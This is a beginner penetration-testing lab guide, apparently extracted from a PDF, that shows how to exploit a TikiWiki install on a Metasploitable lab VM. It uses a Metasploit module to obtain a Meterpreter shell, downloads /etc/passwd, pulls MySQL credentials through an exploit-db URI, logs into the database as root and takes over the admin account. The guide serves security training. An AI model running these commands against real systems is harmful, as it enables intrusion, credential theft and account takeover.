Intro To Penetration Testing - Lab Guide Three ! LabGuideThree ! * Twitter@shai_saint* * 3* ** Prerequisites! Thankyoufordownloadingthe n00bpentesting.comLabGuideThree .Thisguideis

Exploitation

n00bpentesting.com

n00bpentesting.com Lab Guide Three

Twitter @shai_saint 2

Prerequisites 3 Hardware 3 Software 3

Topics Covered 4 A Note 4 Before You Begin 4 Lab 0ne – Exploitation 5 Answer: Exploit-‐db Challenge 10 What’s Next? 15



Prerequisites Thank you for downloading the n00bpentesting.com Lab Guide Three. This guide is designed to help the n00b penetration tester get their feet wet with some of the tools covered on n00bpentesting.com while honing their skills following the Penetration Testing Execution Standard.

Hardware

• Computer with Linux, Windows, or Mac OSX • 4GB RAM • Hard-‐drive with at least 50GB

Software VirtualBox Virtualization Software http://www.virtualbox.org/wiki/Downloads BackTrack 5 R1 Virtual Machine http://www.backtrack-‐linux.org/downloads Windows XP SP2 Virtual Machine Supply your own copy or use a NIST Image NIST -‐ http://nvd.nist.gov/fdcc/download_fdcc.cfm Metasploitable Virtual Machine http://updates.metaspoit.com/data/Metasploitable.zip.torrent



Topics Covered

• Exploitation

A Note All n00bpentesting.com guides will follow applicable sections of the Penetration Testing Execution Standard (PTES). It is highly recommended that any penetration tester or one who wants to move into this field should read and regularly reference the standard. It can be found here: http://www.pentest-‐standard.org/

Before You Begin It is important to update BackTrack, SET, and Metasploit before you begin each lesson. Updating these packages will ensure the latest tool updates and fixes are applied for better stability and exploit success. To Update BackTrack At the command prompt type: apt-‐get update && apt-‐get upgrade && apt-‐get dist-‐upgrade, press ENTER To Update Set At the command prompt type: cd /pentest/exploits/set && svn update, press ENTER To Update Metasploit At the command prompt type: cd /pentest/exploits/framework && svn update, press ENTER



Lab 0ne – Exploitation In this lab you will learn how to leverage the verified metasploit vulnerability to exploit the target. You have researched the applications on the target system and verified that there is a vulnerability to exploit using metasploit. We will use the vulnerability we “tikiwiki_graph_formula_exec”. I will also share the answer to the exploit-‐db challenge.

1. Start the Backtrack VM 2. Start the metasploitable VM 3. In the BackTrack VM, update metasploit by typing at the command prompt:

msfupdate, press ENTER Once the update is finished you will be at revision 14418 or higher.

4. Start metasploit, at the command prompt type: msfconsole, press ENTER When metasploit is started, you will see when it was last updated

We will now instruct metasploit to use the exploit we researched; “tikiwiki_graph_formula_exec”.



5. At the msfconsole type: use exploit/unix/webapp/tikiwiki_graph_formula_exec, press ENTER

We will need to tell the exploit the target IP address

6. At the msfconsole type: show options

This will show the available options that can be configured for the exploit. Some options such as RPORT and URI already have settings and are ok as set. We need to provide the RHOST.



7. At the msfconsole type: set RHOST “metasploitable_IP_Address”, press ENTER

This is the only option we need set and are now ready to exploit our target.

8. At the msfconsole type: exploit, press ENTER The exploit will run and when successful you will get returned a Meterpreter session.

You have successfully run the exploit on the target system. The Meterpreter is a very powerful command shell that has many great features.

9. To see what commands are available, at the meterpreter prompt type: help, press ENTER



Take time to look at all the available commands. Here are the available File system commands

Other commands that are important;

• getuid – show what the current process user • cd – change directory • ls – list • download – download files from the target

At this point our exploit process is running as www-‐data. This user will not have the privileges required to make system changes, however, we can still download the /etc/passwd file to get usernames for password brute force attacks.



Also, look at output provided by the exploit. It looks like we obtained the mysql database credentials. Ponder the possibilities.



Answer: Exploit-‐db Challenge During the vulnerability research phase there were several exploits available for tikiwiki at exploit-‐db.com. Lets take a look at “TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability“. 1. Open your browser and go to: www.exploit-‐db.com 2. Search for “tikiwi”



3. Click on the name of the exploit “TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability“.

A brief description is provided of the exploit followed by a list of URIs that can be appended to the web application root to dump the database credentials. 4. Open your browser and in the URL address field type:

http://metasploitable_IP_Address/tikiwiki 5. Copy the first URI from exploit-‐db: /tiki-‐listpages.php?offset=0&sort_mode= 6. Paste this URI after http://metasploitable_IP_Address/tikwiki

Will look like this: http://192.168.99.102/tikiwiki/tiki-‐listpages.php?offset=0&sort_mode=

7. Press ENTER



The web page will show an error



8. Scroll down the page and you will be presented the mysql database credentials

These DB credentials can now be used to login to the mysql database. 9. Open a command shell and type: mysql –h “metasploitable_IP_Address” –uroot –

proot, press ENTER

You are now logged in the mysql database as root user. Let’s get the user information from the database. 10. At the mysql prompt type: use tikiwiki195; press ENTER

(make sure you type a semi-‐colon (;) after each command) A message will indicate that the database has been changed

Lets see what tables exist in the database.



11. At the mysql prompt type: show tables; A long list of tables will print. We are interested in users_users in the list. To view the contents of the table we need to perform a database function called “select”. 12. At the mysql prompt type: select * FROM users_users; Users currently in the database will be displayed. The user admin with the password admin looks like a good account.

Let’s go back to the web page for tikiwiki and login with these credentials 13. In your browser go to: http://metasploitabe_IP_Address/tikiwiki 14. In the login form enter: admin for both the user and pass, click login

You will be prompted to change the password, make it something easy like “pass123” You are now logged into the web application as the administrator!



What’s Next? The next step is Post Exploitation. Please see “Intro To Penetration Testing – Lab Guide Four.

Intro To Penetration Testing - Lab Guide Three ! LabGuideThree *! * * Twitter@shai_saint* * 3* ** Prerequisites! Thankyoufordownloadingthe n00bpentesting.comLabGuideThree .Thisguideis

Documents

Intro To Penetration Testing - Lab Guide Three ! LabGuideThree ! * Twitter@shai_saint* * 3* ** Prerequisites! Thankyoufordownloadingthe n00bpentesting.comLabGuideThree .Thisguideis